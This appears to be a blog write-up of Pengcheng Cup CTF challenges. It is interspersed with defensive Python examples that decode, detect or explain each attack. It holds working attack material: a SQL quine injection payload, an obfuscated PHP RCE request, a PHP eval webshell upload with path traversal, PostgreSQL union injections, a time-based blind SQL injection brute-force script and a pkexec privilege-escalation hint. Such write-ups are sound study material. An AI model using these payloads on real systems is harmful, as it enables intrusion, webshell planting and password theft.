Pengcheng Cup Preliminary Round

The 2nd “鹏城杯” (Pengcheng Cup) Preliminary Round


Web

Ez_Java

After the contest I learned that this was a second-stage (double) deserialization to get past the class blacklist, and that the cc2 gadget chain can be used to call any no-argument method.
Reference
an expert player's writeup

简单包含 (Simple Include)

Bypass the WAF by exploiting the way it confuses the file parameter with the POST parameters, then read the flag directly through a PHP pseudo-protocol (stream wrapper).

can_u_login

The classic "SQL quine" (self-output) injection: the query has to return exactly the string that was submitted. The same trick appeared in the 5th Space CTF; see https://www.anquanke.com/post/id/253570

?password=1' union select(REPLACE(REPLACE('1" union select(REPLACE(REPLACE("!",CHAR(34),CHAR(39)),CHAR(33),"!")) --+',CHAR(34),CHAR(39)),CHAR(33),'1" union select(REPLACE(REPLACE("!",CHAR(34),CHAR(39)),CHAR(33),"!")) --+')) --+
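Why that payload satisfies a "query output must equal the input" check is easier to see when the two REPLACE calls are reproduced locally. The following is an added example (not code from the writeup): it rebuilds the payload from its inner template, checks the quine property with plain string replacement, and contrasts a concatenated query with a bound-parameter lookup on a constructed SQLite table; the table and its rows are sample data I made up for the demonstration.

```python
import sqlite3

# Inner template the payload is built from. "!" marks the spot where the
# template re-inserts itself; the double quotes later become single quotes.
TEMPLATE = '1" union select(REPLACE(REPLACE("!",CHAR(34),CHAR(39)),CHAR(33),"!")) --+'


def replace_chain(t: str) -> str:
    """Mirror what the database computes for
    REPLACE(REPLACE(t, CHAR(34), CHAR(39)), CHAR(33), t):
    first every " becomes ', then every ! becomes the original template."""
    return t.replace('"', "'").replace("!", t)


def quine_payload(t: str) -> str:
    """The full value submitted as ?password=..., assembled from the template."""
    return ("1' union select(REPLACE(REPLACE('" + t
            + "',CHAR(34),CHAR(39)),CHAR(33),'" + t + "')) --+")


def is_quine(t: str) -> bool:
    """True when the SELECT's output is byte-for-byte the submitted password."""
    return replace_chain(t) == quine_payload(t)


def vulnerable_query(password: str) -> str:
    """String concatenation: the value the application later compares against
    the submitted password is whatever the injected UNION returns, and for a
    quine that is the submitted password itself."""
    return "SELECT password FROM users WHERE password='" + password + "'"


def parameterised_lookup(password: str):
    """Same lookup with a bound parameter on an in-memory SQLite table
    (constructed sample data). The payload is treated as data, not SQL,
    so it matches no row and the comparison fails."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES('admin', 'correct-horse')")
    row = con.execute("SELECT password FROM users WHERE password=?",
                      (password,)).fetchone()
    con.close()
    return row


if __name__ == "__main__":
    p = quine_payload(TEMPLATE)
    print(p)
    print("quine:", is_quine(TEMPLATE))
    print(vulnerable_query(p))
    print("bound lookup:", parameterised_lookup(p))
```

The check in is_quine is the whole point of the challenge: the application compares the row it fetched with the password the user typed, and a quine makes those two strings identical without knowing any real password. Binding the value as a parameter removes the UNION entirely, so the fetched row is simply empty.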

简单的php (Simple PHP)

Bitwise NOT (~) on high-byte strings gets past the filter on alphabetic characters; after that it is an ordinary parameterless RCE (a chain of no-argument calls).

GET /?code=[~%8C%86%8C%8B%9A%92][~%CF]([~%9A%91%9B][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]())); HTTP/1.1
aaa: whoami
Host: 192.168.1.111:8220
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: cat /ffffflaggg
aaa: whoami
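When a request like the one above shows up in a log, the `[~%8C...]` runs are opaque until the NOT is undone. The following is an added example (not code from the writeup) that URL-decodes the code parameter, inverts every byte in each `~`-prefixed run to recover the hidden function names, and flags the ones a reviewer would care about; the parameter value is copied from the request above, and the list of names to flag is my own choice.

```python
import re
from urllib.parse import unquote_to_bytes

# The code= parameter from the request above.
CODE_PARAM = ("[~%8C%86%8C%8B%9A%92][~%CF]([~%9A%91%9B][~%CF]"
              "([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]()));")

# A ~ followed by one or more high bytes: PHP's bitwise NOT on a string
# inverts every byte, so 0x8C turns back into 0x73 ('s') and so on.
NOT_RUN = re.compile(rb"~([\x80-\xff]+)")


def _invert(chunk: bytes) -> bytes:
    return bytes(b ^ 0xFF for b in chunk)


def decode_not_tokens(param: str) -> list:
    """Return the plaintext strings hidden behind each ~ run, in order."""
    raw = unquote_to_bytes(param)
    return [_invert(m.group(1)).decode("latin-1") for m in NOT_RUN.finditer(raw)]


def deobfuscate(param: str) -> str:
    """Rewrite the parameter with every ~<bytes> replaced by the decoded literal,
    giving a readable form of the call chain. In PHP ["system"][0] simply
    evaluates to the string "system", so the result reads as nested calls."""
    raw = unquote_to_bytes(param)
    out = NOT_RUN.sub(lambda m: b'"' + _invert(m.group(1)) + b'"', raw)
    return out.decode("latin-1")


# Names worth alerting on once the NOT layer is removed (my selection, not
# an exhaustive list of PHP's dangerous functions).
SUSPICIOUS = ("system", "exec", "passthru", "shell_exec", "getallheaders")


def flag_tokens(param: str) -> list:
    return [t for t in decode_not_tokens(param) if t in SUSPICIOUS]


if __name__ == "__main__":
    print(decode_not_tokens(CODE_PARAM))
    print(deobfuscate(CODE_PARAM))
    print("flagged:", flag_tokens(CODE_PARAM))
```

Decoding shows the request is `system(end(getallheaders()))`: the command is taken from the last request header, which is why the raw request above ends with an extra header. A filter that only inspects the literal query string for letters never sees any of this; normalising the `~` runs before matching does.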

高手高手高高手 (Master of Masters)

Git source code leak. The admin credentials admin/admin123 were recovered from it. A CVE for this CMS can be found online, but the source had been modified, so the final webshell upload PoC was:

POST /navigate_upload.php?session_id=dj8sd2gm68i5c8fr8s7tnm3tf3&id=....//....//....//navigate_info.php HTTP/1.1
Host: 192.168.1.116
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------336212135019351390254156611980
Content-Length: 507
Origin: http://192.168.1.116
Connection: close
Referer: http://192.168.1.116/navigate.php?fid=files
Cookie: PHPSESSID=dj8sd2gm68i5c8fr8s7tnm3tf3; NVSID_7da51544=dj8sd2gm68i5c8fr8s7tnm3tf3; navigate-tinymce-scroll=%7B%7D; navigate-language=en

-----------------------------336212135019351390254156611980
Content-Disposition: form-data; name="name"

a.png
-----------------------------336212135019351390254156611980
Content-Disposition: form-data; name="engine"

picnik
-----------------------------336212135019351390254156611980
Content-Disposition: form-data; name="file"; filename="a.png"
Content-Type: application/octet-stream

<?php
echo 111;
@eval($_POST['cmd']);
?>

-----------------------------336212135019351390254156611980--

Then I downloaded I_want_capture_the_flag and found that it requires deleting bocai.html and bocai.png, so privilege escalation is needed.
find / -user root -perm -4000 -print 2>/dev/null shows that pkexec is available.
After escalating, read /root/flag directly, then run I_want_capture_the_flag locally to obtain the flag.

easygo

PostgreSQL injection with no filtering at all; the table name found is super_secret_table

1' union select 1,tablename from pg_tables where schemaname='public' limit 1; --+

Then query the flag

1' union select 1,flag from super_secret_table; --+

easy_sql

Brute-forced the users' passwords (time-based blind injection); in the end SuperF1@g and F1@g_1N_Th1S_UsEr_Y0u_Ge7_P@ssW0rd!!! were the useful ones, and none of the remaining users held the flag.

import requests
import time
import string

url = "http://192.168.1.109/index.php"

# name = "SCA7TERED"
name = "c"
temp = ""
# Cha0s_aaa_bbb_ccc
# SuperF1@g SuperF1@g_aaa_bbb_ccc
charset = string.ascii_letters + string.digits
# the run that recovered the password used this wider charset (punctuation included)
charset = "abcdefghijklmnopqrstuvwxyz{|}~!\"#$%&\'()[\\]^_`*+,-./:;<=>?@A!\"#0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
print(charset)
print(len(charset))

# known tail of the password as ASCII codes ("rd!!!"); the password is
# recovered from the right end leftwards, one character per round
j = 5
re = [114, 100, 33, 33, 33]
# ! r c
# rite@Ctfec
while True:
    s = ""
    for o in re:
        s += "," + str(o)
    print(s)
    j = j + 1
    found = False
    for i in charset:
        temp = ord(i)
        # earlier variants of the probe, kept for reference:
        # payload = '''or case(right(`name`,{}) <> binary(char({},83, 99, 97, 55, 116, 101, 114, 101, 100))) when "1" then "0" else benchmark(100000000,MD5("testestest")) end;#'''.format(j, temp)
        # payload = '''or case (right(`pwd`,{})<>binary(char({},67,104,97,48,115,95,97,97,97,95,98,98,98,95,99,99,99))) when "1" then "0" else benchmark(100000000,MD5("testestest")) end;#'''.format(j, temp)
        # payload = '''or name = "SuperF1@g" or case (right(`pwd`,{})<>binary(char({},))) when "1" then "0" else benchmark(100000000,MD5("testestest")) end;#'''.format(j, temp)
        # when the guessed suffix matches, CASE falls into the benchmark() branch
        # and the response is delayed; otherwise the query returns at once
        payload = ('''or case(right(`pwd`,{}) <> binary(char({}''' + s + '''))) when "1" then "0" else benchmark(100000000,MD5("testestest")) end;#''').format(j, temp)
        print(payload)
        start_time = time.time()  # time before sending the probe
        # r = requests.get(url,params = params)
        a = requests.post(url, data={
            "User": '''\\''',  # a lone backslash escapes the closing quote so Pass lands inside the SQL
            "Pass": payload
        }, allow_redirects=False)
        # print(a.status_code)
        # print(a.text)
        end_time = time.time()  # time after the response
        # print(end_time - start_time)
        if end_time - start_time > 0.5:
            name = i
            print(name)
            # re.append(ord(i))
            re.insert(0, ord(i))
            # re.reverse()
            print(re)
            found = True
            break
        else:
            pass
    if not found:
        # no character produced a delay: the whole password has been recovered
        print("".join(chr(c) for c in re))
        break
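From the defending side, the script above leaves a very recognisable trace: dozens of requests from one client whose password field carries a CASE/benchmark() construct, a few of which take seconds to answer. The following is an added example (not code from the writeup) that scores a parameter value for those markers and aggregates per client over a constructed application log; the log shape (timestamp, client, parameter value, response time) and the sample entries are my own and do not correspond to any real product's format.

```python
import re
from collections import defaultdict

# Markers of time-based blind SQL injection as used in the script above:
# a delay primitive, a character-at-a-time comparison, and a CASE branch.
DELAY = re.compile(r"\b(benchmark|sleep|pg_sleep|waitfor\s+delay)\s*\(", re.I)
CHAR_PROBE = re.compile(r"\b(right|left|substr(?:ing)?|mid|ascii)\s*\(.*?\bchar\s*\(", re.I)
CASE_BRANCH = re.compile(r"\bcase\b.*?\bwhen\b.*?\belse\b", re.I)


def score_param(value: str) -> int:
    """0-3: how many blind-injection markers a single parameter value carries."""
    return sum(1 for rx in (DELAY, CHAR_PROBE, CASE_BRANCH) if rx.search(value))


def classify(entries, slow=0.5):
    """entries: iterable of (timestamp, client_ip, param_value, response_seconds).
    Returns, per client that sent at least one marked value, the request count,
    how many values carried >= 2 markers, and how many responses were slow.
    Slow responses among marked requests are the oracle answering 'match'."""
    findings = defaultdict(lambda: {"requests": 0, "marked": 0, "slow": 0})
    for _ts, ip, value, secs in entries:
        f = findings[ip]
        f["requests"] += 1
        if score_param(value) >= 2:
            f["marked"] += 1
            if secs >= slow:
                f["slow"] += 1
    return {ip: f for ip, f in findings.items() if f["marked"] > 0}


def sample_entries():
    """Constructed log entries, not real traffic: one client sends 30 probes of
    the shape used above (3 of them slow because the guess matched), another
    client logs in normally twice."""
    probe = ('or case(right(`pwd`,{}) <> binary(char({},114,100,33,33,33))) '
             'when "1" then "0" else benchmark(100000000,MD5("testestest")) end;#')
    entries = []
    for n in range(30):
        secs = 2.3 if n % 10 == 9 else 0.05
        entries.append((1000.0 + n, "10.0.0.7", probe.format(6, 33 + n), secs))
    entries.append((1010.0, "10.0.0.8", "hunter2", 0.04))
    entries.append((1011.0, "10.0.0.8", "hunter2!", 0.04))
    return entries


if __name__ == "__main__":
    for ip, f in classify(sample_entries()).items():
        print(ip, f)
```

Two markers rather than one are required so that a password that merely contains the word "case" is not flagged; the delay primitive plus the per-character probe together are specific to this technique. The better fix is still the one the rest of this page keeps pointing at: bind the User and Pass values as parameters so the CASE never reaches the SQL parser.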

压缩包 (Archive)

Creating a directory and a shell file with the same name bypasses the check; upload the webshell and read the flag directly.

Misc

简单取证 (Simple Forensics)

First, the password can be recovered from the cmd history.

Then, listing the files reveals secret.jpg
0x0000000002325028 1 0 R–r– \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\secret.jpg
After dumping it, the file turns out to be a byte-reversed zip. Decrypt it with the password, plot the contents as a scatter plot with gnuplot, and the result is a QR code; scanning it gives the flag.

what_is_log

After the password is entered there should be some kind of confirmation string; a global search does indeed find it.

Misc_water

The image filename hints at a reversed JPG. It contains a watermark; after extracting it, unzip the archive, brute-force the image's width and height, and the flag appears.
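Both 简单取证 and Misc_water rely on spotting a file whose bytes were written back to front: the signature that should open the file instead appears mirrored at its end. The following is an added example (not code from the writeup) that detects that condition for a few common formats, undoes it, and lists the members of the recovered zip; the sample archive is constructed in memory for the demonstration, and the signature table is my own small selection.

```python
import io
import zipfile

# Signatures expected at the *start* of a healthy file. In a byte-reversed
# file the same bytes appear, mirrored, at the *end*.
MAGIC = {
    "zip": b"PK\x03\x04",
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}


def detect_reversed(data: bytes):
    """Return the format name if data looks like a byte-reversed file, else None.
    A file that already starts with a known signature is left alone."""
    for sig in MAGIC.values():
        if data.startswith(sig):
            return None
    for name, sig in MAGIC.items():
        if data.endswith(sig[::-1]):
            return name
    return None


def unreverse(data: bytes) -> bytes:
    return data[::-1]


def recover_zip_names(data: bytes) -> list:
    """Undo the reversal if needed and list the archive's members.
    (Password-protected entries still list fine; extraction would need pwd=.)"""
    if detect_reversed(data) == "zip":
        data = unreverse(data)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def make_sample_reversed_zip() -> bytes:
    """Constructed test input: a small zip holding a gnuplot-style point list,
    then reversed byte by byte."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("secret.txt", "1 1\n2 1\n1 2\n")
    return unreverse(buf.getvalue())


if __name__ == "__main__":
    blob = make_sample_reversed_zip()
    print("looks reversed as:", detect_reversed(blob))
    print("members:", recover_zip_names(blob))
```

The "starts with a real signature" check matters: a healthy JPEG happens to end with `FF D9`, so a naive tail-only test could misfire, and a reversed JPEG is recognised by the mirrored `FF D8 FF` at its end rather than by anything at its start.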

babybit

Recover the vmdk with DiskGenius, which yields four files.

Then load SYSTEM into Registry Explorer to read the registry. FVEStats holds the encryption and decryption timestamps; they are in UTC, so add 8 hours for Beijing time. The final flag is PCL{2022/6/13_15:17:39_2022/6/13_15:23:46}
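The +8 step is where these timestamp flags usually go wrong, so here is an added example (not code from the writeup) that converts a Windows FILETIME to UTC with integer arithmetic, shifts it to UTC+8, and formats it the way this flag is written. It assumes the stored values are FILETIME (100 ns ticks since 1601-01-01 UTC), which is the usual registry representation but is not something the writeup states; the two sample tick values are constructed so that they reproduce the flag above.

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100 ns ticks since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000
BEIJING = timezone(timedelta(hours=8))


def filetime_to_utc(ft: int) -> datetime:
    """Integer conversion so large tick counts lose no precision."""
    seconds, ticks = divmod(ft, TICKS_PER_SECOND)
    return FILETIME_EPOCH + timedelta(seconds=seconds, microseconds=ticks // 10)


def utc_to_filetime(dt: datetime) -> int:
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def flag_stamp(ft: int, tz=BEIJING) -> str:
    """Y/M/D_H:MM:SS in the local zone, month and day without zero padding,
    matching how this challenge's flag is written."""
    d = filetime_to_utc(ft).astimezone(tz)
    return f"{d.year}/{d.month}/{d.day}_{d.hour}:{d.minute:02d}:{d.second:02d}"


def build_flag(start_ft: int, end_ft: int) -> str:
    return "PCL{" + flag_stamp(start_ft) + "_" + flag_stamp(end_ft) + "}"


# Constructed sample values: the UTC instants that correspond to the
# Beijing times in the flag, expressed as FILETIME ticks.
SAMPLE_START = utc_to_filetime(datetime(2022, 6, 13, 7, 17, 39, tzinfo=timezone.utc))
SAMPLE_END = utc_to_filetime(datetime(2022, 6, 13, 7, 23, 46, tzinfo=timezone.utc))

if __name__ == "__main__":
    print(SAMPLE_START, SAMPLE_END)
    print(build_flag(SAMPLE_START, SAMPLE_END))
```

Keeping the conversion in integers (divmod on the tick count) avoids the rounding that creeps in when the 18-digit tick value is first turned into a float; the same routine serves any other registry or NTFS timestamp during a timeline reconstruction.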


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting.